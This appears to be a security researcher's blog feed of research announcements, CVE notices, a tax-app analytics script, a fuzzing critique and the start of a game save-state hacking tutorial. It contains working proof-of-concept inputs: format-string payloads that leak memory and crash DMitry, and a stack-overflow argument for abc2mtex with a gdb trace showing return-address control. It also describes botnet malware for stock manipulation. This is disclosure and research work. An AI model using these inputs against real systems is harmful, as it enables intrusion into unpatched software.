End-host runtime monitors (e.g., CFI, system call IDS) flag processes in response to symptoms of a possible attack. Unfortunately, the symptom (e.g., invalid control transfer) may occur long after the root cause (e.g., buffer overflow), creating a gap whereby bug reports received by developers contain (at best) a snapshot of the process long after it executed the buggy instructions. To help system administrators provide developers with more concise reports, we propose ARCUS, an automated framework that performs root cause analysis over the execution flagged by the end-host monitor. ARCUS works by testing "what if" questions to detect vulnerable states, systematically localizing bugs to their concise root cause while finding additional enforceable checks at the program binary level to demonstrably block them. Using hardware-supported processor tracing, ARCUS decouples the cost of analysis from host performance.

We have implemented ARCUS and evaluated it on 31 vulnerabilities across 20 programs along with over 9,000 test cases from the RIPE and Juliet suites. ARCUS identifies the root cause of all tested exploits — with 0 false positives or negatives — and even finds 4 new 0-day vulnerabilities in traces averaging 4,000,000 basic blocks. ARCUS handles programs compiled from upwards of 810,000 lines of C/C++ code without needing concrete inputs or re-execution.

In the coming months, we will also publish the source code for ARCUS and some sample data for the community to use. ARCUS has already led to the discovery of 4 novel vulnerabilities, one of which is currently public: EDB-47254. The others will be released in the coming months.

"Justitia" Biometric Privacy to Appear in ASIACCS'21

2020-10-26T10:00:00-04:00

My coauthors and I will be presenting the paper "Cryptographic Key Derivation from Biometric Inferences for Remote Authentication" at Asia CCS 2021 in June of next year. Below is a preview of the abstract:

Biometric authentication is getting increasingly popular because of its appealing usability and improvements in biometric sensors. At the same time, it raises serious privacy concerns since the common deployment involves storing bio-templates in remote servers. Current solutions propose to keep these templates on the client's device, outside the server's reach. This binds the client to the initial device. A more attractive solution is to have the server authenticate the client, thereby decoupling them from the device.

Unfortunately, existing biometric template protection schemes suffer from either practicality or accuracy problems. The state-of-the-art deep learning (DL) solutions solve the accuracy problem in face- and voice-based verification. However, existing privacy-preserving methods do not accommodate the DL methods, as they are generally tailored to the hand-crafted feature space of specific modalities.

In this work, we propose a novel pipeline, Justitia, that makes DL-inferences of face and voice biometrics compatible with the standard privacy-preserving primitives, like fuzzy extractors (FE). For this, we first form a bridge between Euclidean (or cosine) space of DL and Hamming space of FE, while maintaining the accuracy and privacy of underlying schemes. We also introduce efficient noise handling methods to keep the FE scheme practically applicable.

We implement an end-to-end prototype to evaluate our design, then show how to improve the security for sensitive authentications and usability for non-sensitive, day-to-day authentications. Justitia achieves the same error rate as the plaintext baseline on the YouTube Faces benchmark: 0.33% false rejection at zero false acceptance. Moreover, combining face and voice achieves 1.32% false rejection at zero false acceptance. According to our systematic security assessments conducted through prior approaches and our novel black-box method, Justitia achieves ~25 bits and ~33 bits of security guarantees for face- and face&voice-based pipelines, respectively.

"Bot2Stock" to Appear in ACSAC'20

2020-10-04T10:00:00-04:00

My coauthors and I will be presenting a paper "On the Feasibility of Automating Stock Market Manipulation" at ACSAC 2020 in December. Below is a preview of the abstract:

This work presents the first findings on the feasibility of using botnets to automate stock market manipulation. Our analysis incorporates data gathered from SEC case files, security surveys of online brokerages, and dark web marketplace data. We address several technical challenges, including how to adapt existing techniques for automation, the cost of hijacking brokerage accounts, avoiding detection, and more. We consolidate our findings into a working proof-of-concept, man-in-the-browser malware, Bot2Stock, capable of controlling victim email and brokerage accounts to commit fraud. We evaluate our bots and protocol using agent-based market simulations, where we find that a 1.5% ratio of bots to benign traders yields a 2.8% return on investment (ROI) per attack. Given the short duration of each attack (< 1 minute), achieving this ratio is trivial, requiring only 4 bots to target stocks like IBM. 1,000 bots, cumulatively gathered over 1 year, can turn $100,000 into $1,022,000, placing Bot2Stock on par with existing botnet scams.

The evaluation artifact is also available. Be warned, however, that we used a 32-core server to generate the results, so casual users may find the experiments difficult to reproduce.

New CVE Published (CVE-2020-14931)

2020-06-29T18:00:00-04:00

CVE-2020-14931 has been assigned for a vulnerability I found in DMitry. The details are available here.

This issue is currently being patched.

H&R Block App Analytics for 2020

2020-06-18T17:30:00-04:00

Two years ago I started a series about using the analytics publicly released by the U.S. government to glean some information about H&R Block's mobile apps. I'm a few months late this year, but it's time to update the numbers for the 2020 tax year. The 2019 numbers are available here.

This time I went ahead and updated the code to make parsing a little more flexible:

:::python
#!/usr/bin/env python
from __future__ import print_function

import sys
import json
import re

def parse_subtokens(tokens):
    """ Parses subtokens and returns a dictionary. If invalid, None is returned.

    We expect all user agents to start with "HRB MOBILE", after which we can encounter
    OS, device, app, authentication, browser, and app version strings. Everything except
    version is matched using exact string comparisons. Version uses a regex.
    """
    res = {'OS': 'N/A', 'DEVICE': 'N/A', 'APP': 'N/A', 'AUTH': 'N/A', 'VERSION': 'N/A', 'BROWSER': 'N/A'}

    token_mapping = {'ANDROID': 'OS', 'IOS': 'OS',
                     'PHONE': 'DEVICE', 'TABLET': 'DEVICE',
                     'MYBLOCK': 'APP', 'TAXES': 'APP',
                     'TOUCHID': 'AUTH', 'FACEID': 'AUTH',
                     'Mozilla': 'BROWSER'}

    # Guard against short user agents before indexing into the token list
    if len(tokens) < 2 or tokens[0] != 'HRB':
        return None

    if tokens[1] != 'MOBILE':
        return None

    for token in tokens[2:]:
        if token in token_mapping:
            res[token_mapping[token]] = token
        elif re.match(r'v?[0-9]+\.[0-9]+\.[0-9]+', token):
            res['VERSION'] = token
        else:
            print('WARNING: Unknown token: %s from %s' % (token, str(tokens)), file=sys.stderr)

    # Cleanups:
    #     1) Some versions of the Android app prefix 'v' onto version

    if res['VERSION'][0] == 'v':
        res['VERSION'] = res['VERSION'][1:]

    assert len(res) == 6
    return res

def is_hrb(year, filter, line):
    """ Validate that a line should be parsed and added to the buckets.

    Specifically, entry should contain the right year, be a HRB user-agent,
    and contain the filter keyword if one was provided.
    """
    if line[:4] != year:
        return False
    if line[11:14] != 'HRB':
        return False
    if filter is not None and filter not in line:
        return False
    return True

if __name__ == '__main__':

    if len(sys.argv) < 3:
        print('Usage: %s <tax-year> [filter] <filepath>' % sys.argv[0])
        sys.exit(0)

    if len(sys.argv) == 3:
        filter = None
    else:
        filter = sys.argv[2]

    with open(sys.argv[-1], 'r') as ifile:
        data = [line.strip() for line in ifile if is_hrb(sys.argv[1], filter, line)]

    buckets = {
        'OS': {
            'IOS':     0,
            'ANDROID': 0,
        },
        'DEVICE': {
            'PHONE':   0,
            'TABLET':  0,
        },
        'APP': {
            'MYBLOCK': 0,
            'TAXES':   0,
        },
        'AUTH': {
            'TOUCHID': 0,
            'FACEID':  0,
            'N/A':     0,
        },
        'VERSION': {},
        'BROWSER': {},
    }

    for line in data:
        tokens = line.split(',')
        if len(tokens) != 3:
            print('WARNING: Cannot tokenize: %s' % line, file=sys.stderr)
            continue

        subtokens = parse_subtokens(tokens[1].split('-'))
        if subtokens is None:
            print('WARNING: Cannot subtokenize: %s' % tokens[1].split('-'), file=sys.stderr)
            continue

        try:
            count = int(tokens[-1])
        except ValueError:
            print('WARNING: Could not parse count from: %s' % line, file=sys.stderr)
            continue

        # Use .get() so a category missing from a user agent ('N/A') is counted
        # instead of raising KeyError on buckets that don't predefine 'N/A'
        for key in ('OS', 'DEVICE', 'APP', 'AUTH'):
            buckets[key][subtokens[key]] = buckets[key].get(subtokens[key], 0) + count

        if subtokens['VERSION'] in buckets['VERSION']:
            buckets['VERSION'][subtokens['VERSION']] += count
        else:
            buckets['VERSION'][subtokens['VERSION']] = count

        if subtokens['BROWSER'] in buckets['BROWSER']:
            buckets['BROWSER'][subtokens['BROWSER']] += count
        else:
            buckets['BROWSER'][subtokens['BROWSER']] = count

    print(json.dumps(buckets, indent=4))

I've been collecting this data since 2016 and I'm happy to share upon request.
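
For anyone who wants to try the script, here is a rough sketch of how a single input line moves through the tokenizing steps. The sample line is made up: the date layout and field order are assumptions inferred from the slicing offsets in `is_hrb` (`line[:4]` and `line[11:14]`) and from the three-way comma split, not a copy of the real dataset.

```python
import re

# Hypothetical input line: "<date>,<user agent>,<request count>"
sample = '2020-01-13,HRB-MOBILE-IOS-PHONE-TAXES-FACEID-9.2.0,42'

# Same checks as is_hrb(): year prefix, then 'HRB' right after the date and comma
assert sample[:4] == '2020'
assert sample[11:14] == 'HRB'

# Same splits as the main loop: commas first, then dashes inside the user agent
date, agent, count = sample.split(',')
subtokens = agent.split('-')

# The version token is the only one matched by regex rather than exact comparison
versions = [t for t in subtokens if re.match(r'v?[0-9]+\.[0-9]+\.[0-9]+', t)]

print(subtokens)
print(versions, int(count))
```

Everything after `HRB` and `MOBILE` is order-independent in `parse_subtokens`, which is why the mapping table and a single regex are enough.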

Results

Here are the results for 2020, in no particular order:

From January 13 through April 14, 0 requests were made by MyBlock and 563,138 by Taxes.
545,368 requests were made from phones while 17,770 were tablets; about 97% of the requests were phones.
100% of requests were made by devices running iOS.
Seven versions of Taxes appear in the dataset: 9.2.0, 9.2.1, 9.3.0, 9.3.1, 9.4.0, 9.5.0, and 9.6.0.
0.2% of requests contain "Mozilla" in the user-agent.

And the security question from the original blog post:

221,827 requests used TouchID, 265,313 FaceID, and 75,998 showed neither keyword; 39%, 47%, and 14%, respectively.
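
The percentages above can be rechecked from the raw counts with a few lines of Python. This is only a sanity-check sketch; the helper name `share` is my own, and it reports one more decimal place than the rounded figures quoted in the text.

```python
# Request counts copied from the results above
touchid, faceid, neither = 221827, 265313, 75998
phones, tablets = 545368, 17770

# Both breakdowns should cover the same set of requests
total = touchid + faceid + neither
assert total == phones + tablets == 563138

def share(part, whole):
    """Return part/whole as a percentage rounded to one decimal place."""
    return round(100.0 * part / whole, 1)

auth_shares = [share(n, total) for n in (touchid, faceid, neither)]
phone_share = share(phones, total)
print(auth_shares, phone_share)
```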

Comparison to 2019

In 2019, the majority of requests were made by Taxes. Now in 2020, only Taxes appears in the data.
The change in usage of TouchID, FaceID, and neither is -20%, 21%, and -1%, respectively.

Discussion

I'm no longer seeing requests from Android devices or the MyBlock app, which implies that either they have been discontinued or they no longer use the original custom user agents.

We've also reached the point where FaceID has finally overtaken TouchID. Here's a graphic capturing the change:

We'll see next year how the trends change. Thanks for reading!

Fuzzers Suck: New 0-Day Shows We Need To Do Better

2020-06-18T11:50:00-04:00

Fuzz testing (more commonly known as "fuzzing") has become a predominant technique for bug hunting because it's easy to deploy and yields results. Academic security research is now flooded with papers on the topic (USENIX Security alone accepted 7 papers in the 2020 Fall submission cycle), many of which propose incremental improvements that'll be obsolete by next year.

Meanwhile, plenty of serious bugs are slipping through our nets. Take a look at this 0-day my team found in a piece of software from 2016, which is readily available in major Linux distros like Debian, Ubuntu, and Kali:

:::text
$ ./dmitry "%p %p %p %p %p %p"

Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for %p %p %p %p %p %p
Continuing with limited modules
HostIP:
HostName:%p %p %p %p %p %p

Gathered Inic-whois information for 0x5598e89e9b47 (nil) (nil) 0x7ffc2f4878e0 0x7f721845de80 (nil)

[...]

This is a textbook example of an externally-controlled format string vulnerability (CWE-134), in a program that's trivial to fuzz, that others have already found vulnerabilities in. How did such a simple problem go unreported?
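
Notice that the leak is visible in the program's output rather than in its exit status: the `%p` specifiers come back as pointer values. As a rough illustration, here is a sketch of an output-based check for that symptom. The function name and the heuristic are my own, and it assumes glibc-style `%p` rendering (`0x...` or `(nil)`) as seen in the output above.

```python
import re

# Matches glibc-style %p output: hex pointers or "(nil)"
POINTER_RE = re.compile(r'0x[0-9a-f]+|\(nil\)')

def looks_like_format_leak(probe, output):
    """Heuristic: True if a %p probe appears to have been expanded in the output."""
    expected = probe.count('%p')
    for line in output.splitlines():
        if probe in line:
            continue  # the probe was echoed back verbatim, nothing leaked here
        if expected and len(POINTER_RE.findall(line)) >= expected:
            return True
    return False

probe = '%p %p %p %p %p %p'
output = '''HostName:%p %p %p %p %p %p

Gathered Inic-whois information for 0x5598e89e9b47 (nil) (nil) 0x7ffc2f4878e0 0x7f721845de80 (nil)
'''
print(looks_like_format_leak(probe, output))
```

A check like this only works if you already suspect a format string bug and feed the program a suitable probe.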

The problem is that fuzzing assumes vulnerabilities will easily trigger crashes. Unfortunately, this 0-day demonstrates an entire class of bugs where that isn't the case. If you know what you're looking for, it's trivial:

:::text
$ ./dmitry -w %n
Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for %n
Continuing with limited modules
HostIP:
HostName:%n

Segmentation fault

But for a fuzzer using typical mutation strategies, it's actually quite difficult:

:::text
                       american fuzzy lop 2.52b (wrapper)

┌─ process timing ─────────────────────────────────────┬─ overall results ─────┐
│        run time : 0 days, 0 hrs, 10 min, 32 sec      │  cycles done : 0      │
│   last new path : 0 days, 0 hrs, 0 min, 23 sec       │  total paths : 31     │
│ last uniq crash : 0 days, 0 hrs, 1 min, 12 sec       │ uniq crashes : 2      │
│  last uniq hang : 0 days, 0 hrs, 2 min, 56 sec       │   uniq hangs : 4      │
├─ cycle progress ────────────────────┬─ map coverage ─┴───────────────────────┤
│  now processing : 3 (9.68%)         │    map density : 0.08% / 0.24%         │
│ paths timed out : 0 (0.00%)         │ count coverage : 2.13 bits/tuple       │
├─ stage progress ────────────────────┼─ findings in depth ────────────────────┤
│  now trying : havoc                 │ favored paths : 13 (41.94%)            │
│ stage execs : 6540/24.6k (26.61%)   │  new edges on : 17 (54.84%)            │
│ total execs : 45.9k                 │ total crashes : 2 (2 unique)           │
│  exec speed : 585.4/sec             │  total tmouts : 14 (4 unique)          │
├─ fuzzing strategy yields ───────────┴───────────────┬─ path geometry ────────┤
│   bit flips : 0/152, 0/148, 1/140                   │    levels : 3          │
│  byte flips : 0/19, 0/15, 0/7                       │   pending : 28         │
│ arithmetics : 5/1062, 0/75, 0/0                     │  pend fav : 11         │
│  known ints : 1/96, 1/420, 0/308                    │ own finds : 30         │
│  dictionary : 0/0, 0/0, 0/0                         │  imported : n/a        │
│       havoc : 18/36.6k, 0/0                         │ stability : 76.28%     │
│        trim : 5.00%/4, 0.00%                        ├────────────────────────┘
└─────────────────────────────────────────────────────┘          [cpu001: 38%]
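
Note the empty `dictionary` row in the status screen: AFL was run without any user-supplied tokens, so it has to stumble onto `%n` through bit flips and havoc. AFL does accept a dictionary file through its `-x` option, with one `name="value"` entry per line. Below is a minimal sketch that renders such a file. The token list and the `fmt_` naming are my own choices, and I have not measured how much this would speed up the run above.

```python
def afl_dictionary(tokens):
    """Render tokens as lines in AFL's dictionary syntax: name="value"."""
    lines = []
    for i, token in enumerate(tokens):
        # Keep the sketch simple: refuse tokens that would need escaping
        if '"' in token or '\\' in token:
            raise ValueError('token needs escaping: %r' % token)
        lines.append('fmt_%d="%s"' % (i, token))
    return '\n'.join(lines) + '\n'

# Conversion specifiers that tend to expose format string bugs
FORMAT_TOKENS = ['%p', '%s', '%n', '%x']

print(afl_dictionary(FORMAT_TOKENS))
```

Of course, writing this dictionary requires knowing which bug class to look for in the first place, which is exactly the knowledge a typical fuzzing setup lacks.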

Side Note: For repeatability, this is the wrapper code I hacked together to restrict AFL to fuzzing a single command line argument:

:::c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv) {
    char *prog = "./dmitry";
    char *flag = "-w";
    char buf[1024];
    char *cmd[] = {prog, flag, buf, NULL};
    FILE *input;

    if (argc != 2)
        return 0;

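    input = fopen(argv[1], "r");
    if (input == NULL)
        return 1;

    /* Bail out on empty input so buf is never passed along uninitialized */
    if (fgets(buf, sizeof(buf), input) == NULL) {
        fclose(input);
        return 1;
    }
    fclose(input);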

    execv(prog, cmd);

    return 0;
}

The crashes it did find pertain to CVE-2017-7938 — this program is also prone to stack overflows (oops). Also, because most fuzzers rely on stack traces to triage bugs, and these cases completely obliterate the stack, AFL can't tell that they're the same bug (double oops).

Okay, that last paragraph was a bit hostile, so allow me to take a few steps back. I'm not saying fuzzers are completely useless — I'm sure AFL could find the format string 0-day in a few hours — but I do think fuzzing is overrated. These tools rely on being very fast, at the cost of also being very dumb, and we're already seeing the diminishing returns, even as academia turns fuzzer optimization into an Olympic sport. I suspect these tools will never "become smart" because smart usually means slow, which is the antithesis of fuzzing. By calling attention to this trend (thank you for reading this far), I hope researchers will consider other avenues towards smart bug hunting, as opposed to just making fuzzing 5% faster, or adding better scaffolding to support kernels and other niche applications. Those tasks are useful in their own ways, but they leave trivial 0-days like this on the table.

To that end, I'm happy to report that the tool I've been working on for the past year, based on symbolic execution, is what actually led me to this 0-day, and it did so in a mere 16 seconds. I look forward to open sourcing the code, but I'm trying to get a paper published first and it's currently locked in a "major revision" cycle at a top tier security conference. With any luck, the release will be coming at the beginning of 2021. No one said research is fast.

Thanks for reading and happy hacking.

New CVE Published (CVE-2020-9549)

2020-03-02T09:30:00-05:00

CVE-2020-9549 has been assigned for a vulnerability I found in Pdfresurrect. The details are available here.

This issue is currently being patched.

New PoC Published to Exploit-DB (EDB-ID-47254)

2019-08-15T23:30:00-04:00

I published a PoC for a new vulnerability in abc2mtex version 1.6.1. This was discovered while testing an analysis framework I'm developing with my peers at Georgia Tech.

The vulnerability is due to an unsafe strcpy that allows an attacker to overwrite a return address and achieve arbitrary code execution. This is not the first time this program has been found to be susceptible to buffer overflows (CVE-2004-1257), but the novelty of this PoC is that exploitation is achieved using a long input filename whereas the previous CVE relied on providing maliciously crafted data.

Below is a copy of the PoC published to Exploit-DB:

Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
Date: 2019-08-13
Exploit Author: Carter Yagemann <yagemann@gatech.edu>
Vendor Homepage: https://abcnotation.com/abc2mtex/
Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
Version: 1.6.1
Tested on: Debian Buster

An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
address from the openIn function by providing a long input filename. This
carries similar risk to CVE-2004-1257.

Setup:

$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
$ tar -xzf abc2mtex1.6.1.tar.gz
$ make

$ gcc --version
gcc (Debian 8.3.0-6) 8.3.0
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

PoC:

$ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA

GDB:

We're going to place a breakpoint before and after abc.c:241 to show the overflow.

$ gdb -q ./abc2mtex
Reading symbols from ./abc2mtex...done.
(gdb) break abc.c:241
Breakpoint 1 at 0x4139: file abc.c, line 241.
(gdb) break abc.c:242
Breakpoint 2 at 0x414c: file abc.c, line 242.
(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA

Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
241                     (void) strcpy(savename,filename);
(gdb) bt
#0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
#1  0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273
(gdb) c
Continuing.

Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
242                     (void) strcat(filename,".abc");
(gdb) bt
#0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
#1  0x0000414243444546 in ?? ()
#2  0x00007fffffffe4f8 in ?? ()
#3  0x0000000200000000 in ?? ()
#4  0x0000000000000000 in ?? ()
(gdb) c
Continuing.
file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist

Program received signal SIGSEGV, Segmentation fault.
0x0000414243444546 in ?? ()
(gdb) quit
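
For readers following along, here is a small sketch of how the filename in the PoC maps onto the address in the second backtrace. The padding length of 120 is taken from gdb's `'A' <repeats 120 times>`; the variable names are mine.

```python
import struct

PADDING = 120          # number of 'A' bytes gdb reports before the tail
TAIL = b'FEDCBA'       # the six bytes that land on the saved return address

payload = b'A' * PADDING + TAIL

# x86-64 is little-endian, so the first byte of the tail becomes the lowest
# byte of the address. The upper two bytes stay zero: one is the string's
# terminating NUL, the other was already zero in the original return address.
ret_addr = struct.unpack('<Q', TAIL + b'\x00\x00')[0]

print(len(payload), hex(ret_addr))
```

Reading the tail backwards ("ABCDEF" is 0x41 through 0x46) gives the `0x0000414243444546` frame that replaces `main` in the backtrace.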

A Beginner's Guide to Hacking Video Game Save States (Fire Emblem 7 on the GBA)

2019-06-22T13:00:00-04:00

As a fun change of pace, I decided to write up a beginner's guide to hacking save states for video games. In this tutorial, we're going to take a look at Fire Emblem 7 for the Game Boy Advance (GBA). Specifically, we're going to hack the health bar of the final boss (spoilers!) to be 1 HP. In doing so, I'll cover the simplest practical reverse engineering technique for game hacking: differential analysis. I'll be using an emulator for Android called John GBA, so we'll also get into a few details about how it works.

Conceptually, this guide is very similar to the start of the tutorial provided by Cheat Engine. The main difference with this writeup is we're going to hack an actual video game by modifying an emulator's save state data rather than using a debugger on a running toybox program. Also, I'm going to perform all the steps using only standard GNU/Linux programs and a little bit of Python scripting. Thus, this guide is intended for readers familiar with basic programming and terminal CLI who may not have considered hacking a video game before and want a simple realistic example to get started.

Enjoy.

A Primer on Emulators & Save States

I'll start with a brief summary of what an emulator is. Put simply, it reads a program written for one computer architecture and executes it on another. In our case, the emulator I'm using can run games written for the GBA on an Android device. The most basic way of accomplishing this is using interpretation. Specifically, the emulator mimics the original architecture by allocating memory to represent RAM, CPU registers, etc. It then loads the program into the memory just as the emulated system would and steps through each instruction, modifying the memory accordingly. Taken together, the data values held in the emulated hardware at any given point make up the emulation state.

Interpretation is the easiest form of emulation to implement, but slow because each hardware instruction on the original system is translated into one or more (often many) instructions on the emulator's hardware. To get around this, real emulators often compile and optimize the emulation logic "on-the-fly" using a technique called just-in-time (JIT) compilation. Optimizing emulators is an interesting topic for discussion, but beyond the scope of this guide.

What we do need to understand is save states. By pausing the emulation and storing all the data associated with the emulation state, the emulator can return to that state at any later time. All it has to do is read the saved state back into the memory representing the emulated hardware. This gives us a clean way to hack video games by intentionally corrupting save states. All we have to do is modify some data in the saved state and when the emulator loads it, it'll propagate our modifications into the emulated system:

But in order to do that, we first have to figure out the formatting of the emulator's saved states.
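
To make the idea concrete, here is a toy sketch of an interpreter with save states. Everything in it is invented for illustration: the two-instruction machine, the class name, and the memory layout have nothing to do with the GBA's real CPU or with how John GBA is implemented.

```python
import copy

class ToyMachine:
    """A made-up machine with two instructions, interpreted one step at a time."""

    def __init__(self, program):
        self.program = program
        # The emulation state: a program counter plus a small block of RAM
        self.state = {'pc': 0, 'ram': bytearray(16)}

    def step(self):
        op, addr, value = self.program[self.state['pc']]
        if op == 'SET':
            self.state['ram'][addr] = value
        elif op == 'SUB':
            self.state['ram'][addr] = max(0, self.state['ram'][addr] - value)
        self.state['pc'] += 1

    def save_state(self):
        return copy.deepcopy(self.state)

    def load_state(self, saved):
        self.state = copy.deepcopy(saved)

# "Health" lives at RAM address 3: start at 120, then take two hits
machine = ToyMachine([('SET', 3, 120), ('SUB', 3, 21), ('SUB', 3, 20)])
machine.step()
machine.step()

saved = machine.save_state()
saved['ram'][3] = 1          # corrupt the saved copy, not the running machine
machine.load_state(saved)    # the emulator now believes health is 1
machine.step()               # the next hit finishes the job
print(machine.state['ram'][3])
```

The running program never sees the tampering happen. It simply resumes from whatever the loaded state says.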

Reverse Engineering John GBA's Save State Format

Lucky for us, this emulator's save state formatting is fairly standard and we don't need to understand most of the details for our basic memory hack. First, we know the states have to be saved somewhere in storage. Turns out it's easy to find by just browsing: <internal_shared_storage>/Johnemulators/GBA/state. In this directory we find two file formats: .jg# and .js# where # is the slot number for the save (organizing saves as a linear list of slots is typical for video game emulators). It's easy to see which files we care about for Fire Emblem 7:

$ ls -l
total 301
-rw------- 1 carter carter 113059 Jun 22 02:31 Fire Emblem (U).jg0
-rw------- 1 carter carter 108703 Jun 22 04:24 Fire Emblem (U).jg1
-rw------- 1 carter carter  18502 Jun 22 02:31 Fire Emblem (U).js0
-rw------- 1 carter carter  67051 Jun 22 04:24 Fire Emblem (U).js1

A good first step towards figuring out their formats is to run file and see if there are any recognizable patterns:

$ file -i *
Fire Emblem (U).jg0: application/gzip; charset=binary
Fire Emblem (U).jg1: application/gzip; charset=binary
Fire Emblem (U).js0: image/jpeg; charset=binary
Fire Emblem (U).js1: image/jpeg; charset=binary

Much to our luck, despite the custom file extensions, each save state is actually just a JPEG image and a compressed data file. We don't need to worry about the images, so let's focus on the data files. First, copy them off the Android device into a local directory. Also, make sure to save a backup copy somewhere safe so you won't lose your data if you make a mistake! Next, let's decompress one of them:

# gzip expects compressed files to have the .gz extension,
# so we have to rename it first
mv Fire\ Emblem\ \(U\).jg1 1.gz
gzip -d 1.gz
# after decompressing, gzip will automatically strip the extension
# from the filename
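
If you'd rather skip the renaming, the same step can be sketched in Python. The helper names below are my own, and the magic byte table only covers the two types that `file` reported above.

```python
import gzip
import io

MAGIC = {
    b'\x1f\x8b': 'gzip',       # gzip member header
    b'\xff\xd8\xff': 'jpeg',   # JPEG start-of-image marker
}

def sniff(data):
    """Guess a file type from its leading magic bytes, similar to `file`."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return 'unknown'

def load_state(raw):
    """Decompress a .jg# payload in memory; the file extension is irrelevant."""
    if sniff(raw) != 'gzip':
        raise ValueError('not a gzip stream')
    with gzip.GzipFile(fileobj=io.BytesIO(raw)) as gz:
        return gz.read()
```

To use it, read `Fire Emblem (U).jg1` in binary mode and pass the bytes to `load_state`. The result should match what `gzip -d` writes to disk.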

And take a look at the beginning of the data:

$ hexdump -C 1 | head
00000000  0a 00 00 00 46 49 52 45  45 4d 42 4c 45 4d 45 00  |....FIREEMBLEME.|
00000010  41 45 37 45 00 00 00 00  00 00 00 00 01 00 00 00  |AE7E............|
00000020  00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 d8 7d 00 03  00 00 00 00 00 00 00 00  |.....}..........|
00000040  00 00 00 00 1f 00 00 00  00 00 00 04 a0 7f 00 03  |................|
00000050  14 02 00 00 1c 00 00 00  12 00 00 60 1f 00 00 60  |...........`...`|
00000060  a0 7f 00 03 14 02 00 00  1f 00 00 60 00 00 00 00  |...........`....|
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000080  c0 7d 00 03 0c 02 00 00  d0 7f 00 03 70 fa 0b 08  |.}..........p...|
00000090  3f 00 00 60 00 00 00 00  00 00 00 00 00 00 00 00  |?..`............|

Another lucky break for us. We can see the canonical name for the game (FIREEMBLEM) at the beginning of the data. In fact, if we search the game's ROM (the program as it's stored when it isn't running), we'll see the same name near its beginning too:

$ hexdump -C Fire\ Emblem\ \(U\).gba | grep -A 10 "FIREEMBLEM"
000000a0  46 49 52 45 45 4d 42 4c  45 4d 45 00 41 45 37 45  |FIREEMBLEME.AE7E|
000000b0  30 31 96 00 00 00 00 00  00 00 00 00 00 d1 00 00  |01..............|
000000c0  12 00 a0 e3 00 f0 29 e1  28 d0 9f e5 1f 00 a0 e3  |......).(.......|
000000d0  00 f0 29 e1 18 d0 9f e5  3c 11 9f e5 18 00 8f e2  |..).....<.......|
000000e0  00 00 81 e5 34 11 9f e5  0f e0 a0 e1 11 ff 2f e1  |....4........./.|
000000f0  f2 ff ff ea 00 7e 00 03  a0 7f 00 03 01 33 a0 e3  |.....~.......3..|
00000100  02 3c 83 e2 00 20 93 e5  02 18 a0 e1 21 18 a0 e1  |.<... ......!...|
00000110  00 00 4f e1 0b 40 2d e9  22 18 02 e0 02 0a 11 e2  |..O..@-.".......|
00000120  fe ff ff 1a 00 20 a0 e3  01 00 11 e2 26 00 00 1a  |..... ......&...|
00000130  04 20 82 e2 02 00 11 e2  23 00 00 1a 04 20 82 e2  |. ......#.... ..|
00000140  04 00 11 e2 20 00 00 1a  04 20 82 e2 08 00 11 e2  |.... .... ......|

We now know that after decompressing, the data file contains the plain bytes of the game's memory. Next, we have to figure out which bytes to overwrite in this 723 KB file.
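
The two hexdumps can be compared programmatically. The sketch below reads the title, game code, and maker code from the standard GBA cartridge header offsets (0xA0, 0xAC, and 0xB0), which line up with the ROM dump above. The save state offset of 4 is only what the first hexdump suggests, not a documented part of John GBA's format, and both inputs here are synthetic stand-ins built from the bytes shown.

```python
def parse_gba_header(rom):
    """Extract the cartridge header fields visible in the ROM hexdump."""
    title = rom[0xA0:0xAC].rstrip(b'\x00').decode('ascii')   # 12-byte game title
    code = rom[0xAC:0xB0].decode('ascii')                    # 4-byte game code
    maker = rom[0xB0:0xB2].decode('ascii')                   # 2-byte maker code
    return title, code, maker

def state_title(state):
    """Title as it appears in the save state (offset 4 is an observation)."""
    return state[4:16].rstrip(b'\x00').decode('ascii')

# Synthetic stand-ins: zero padding plus the header bytes from the hexdumps
rom = b'\x00' * 0xA0 + b'FIREEMBLEME\x00AE7E01\x96'
state = b'\x0a\x00\x00\x00' + b'FIREEMBLEME\x00AE7E'

print(parse_gba_header(rom))
print(state_title(state) == parse_gba_header(rom)[0])
```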

Differential Analysis

